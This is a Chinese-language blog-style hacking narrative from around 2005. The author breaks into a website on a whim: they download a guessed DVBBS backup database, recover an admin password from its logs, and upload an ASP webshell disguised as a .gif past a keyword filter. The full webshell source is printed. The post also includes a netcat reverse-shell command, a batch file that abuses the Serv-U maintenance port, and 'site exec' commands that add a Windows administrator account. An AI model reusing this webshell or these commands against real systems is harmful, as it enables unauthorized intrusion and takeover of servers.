突破一流信息监控系统传木马并获得系统权限

今天终于GK完了

无聊闲逛在网上，意识催魂试的找我要文章…

哈~发现一迷信网站，不爽…

（入侵需要理由吗？不需要吗？需要吗？….）

用

telnet www.xxx.com 80

get enter

HTTP/1.1 400 Bad Request

Server: Microsoft-IIS/5.0

Date: Wed, 08 Jun 2005 11:56:00 GMT

Content-Type: text/html

Content-Length: 87

<html><head><title>Error</title></he

</html>

失去了跟主机的连接。

F:\\Documents and Settings\\lu\\桌面>

看到没，获得很多有用的信息哦

先去WEB上看看有没有什么漏洞

哈！发现DVBBS7.1 论坛

前几天有朋友告诉我件事情，说有许多白痴管理员用备分的日期做备分数据库的名字哦！试试看！

dvbbs7.1 是4月6日更新的，他用该用200504**.mdb做名字来命名以前的旧数据库！

没办法，试试！

http://www.xxxx.com/bbs/databackup/20050406.mdb

http://www.xxxx.com/bbs/databackup/20050407.mdb

http://www.xxxx.com/bbs/databackup/20050408.mdb

…..

晕..到32了还没出来

管理员不是白痴哦！

http://www.xxxx.com/bbs/databackup/200504.mdb

faint!他不是白痴谁是！

跳出了可爱的下载对话框！

downloading…. 完成！

用辅臣数据库浏览器打开，选择Dv_Log(2586)

字段名选择l_content 关键字添password2

点查询

许多信息出来了哦！

经过筛选

发现一条：

oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新

哈，想到什么了？登陆啊，不过用户名不知道，是葛飞吗~开玩笑，那简单，其实转化这个我用他本身的页面，

在登陆页面上用户名和密码乱添

点登陆

http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息

填写登录信息这句话意思是“填写登录信息”

那么就把填写登录信息换成叼防！

提交！看到了吧！用户名是“叼防”

晕！

什么名字啊！不管了，登陆！

成功！呵呵~把老兵的asp站长助手另存为admin_system321.gif

上传！

晕！

一流信息监控系统提醒您：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：drop table

换海阳top的传，在晕…还是被拦截！

不行！我就不信上不去！

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="/cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="cmd"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

保存成为cmd.gif

上传成功！

登陆后台用数据库管理还原成根目录下的admin_system321.asp

_system321.asp">http://www.xxx.com/bbs/admin_system321.asp

登陆，啊…CMD窗口那里显示

无法找到该页

您正在搜索的页面可能已经删除、更名或暂时不可用。

——————————————————————————–

请尝试以下操作：

确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。

如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。

单击后退按钮尝试另一个链接。

HTTP 错误 404 – 文件或目录未找到。

Internet 信息服务 (IIS)

——————————————————————————–

技术信息（为技术支持人员提供）

转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。

打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。

把我的SYSTEM32下的CMD.exe用记事本打开，另存为111.gif上传！

在用刚才的方法备分成跟目录下的cmd.exe

把刚才cmd.gif里cmd.exe改成他的绝对路径

全都上传！然后备分！

访问_system321.asp">http://www.xxx.com/bbs/admin_system321.asp

哈！成功！

在用上面的方法把nc传上去！

本地命令提示符执行 nc -vv -l -p 9999

在webshell里执行nc.exe -e cmd.exe 自己IP 9999

NC监听的窗口就出现一个可爱的SHELL

在写个文件如下

echo USER LocalAdministrator>2.txt

echo PASS #l@$ak#.lk;0@P>>2.txt

echo SITE MAINTENANCE>>2.txt

echo -setdomain>>2.txt

echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt

echo -DynDNSEnable=0 >>2.txt

echo DynIPName=>>2.txt

echo -SETUSERSETUP>>2.txt

echo -IP=0.0.0.0>>2.txt

echo -PortNo=22>>2.txt

echo -User=tyrant>>2.txt

echo -Password=19851011>>2.txt

echo -HomeDir=c:\\>>2.txt

echo -Maintenance=System>>2.txt

echo -Ratios=None>>2.txt

echo Access=c:\\^|RWAMEICDP>>2.txt

echo -GETUSERSETUP>>2.txt

"^"符号的作用相信大家都了解吧！我不罗嗦了。

把上面批处理保存为1.txt

在SHELL中用NC提交

nc 127.0.0.1 43958 <1.txt

回显发现

220 Domain settings saved

200-User=test1

200 User settings saved

成功了！成功添加了用户tyrant密码19851011

登陆对方的ftp

转到system32文件夹下

quote site exec "net.exe user tyrant 19851011 /add"

quote site exec "net.exe localgroup administrators tyrant /add"

quote site exec "net.exe user start telnet"

用tyrant管理员telnet上去

传个批处理开3389

哈…正在连接到…

文章到此结束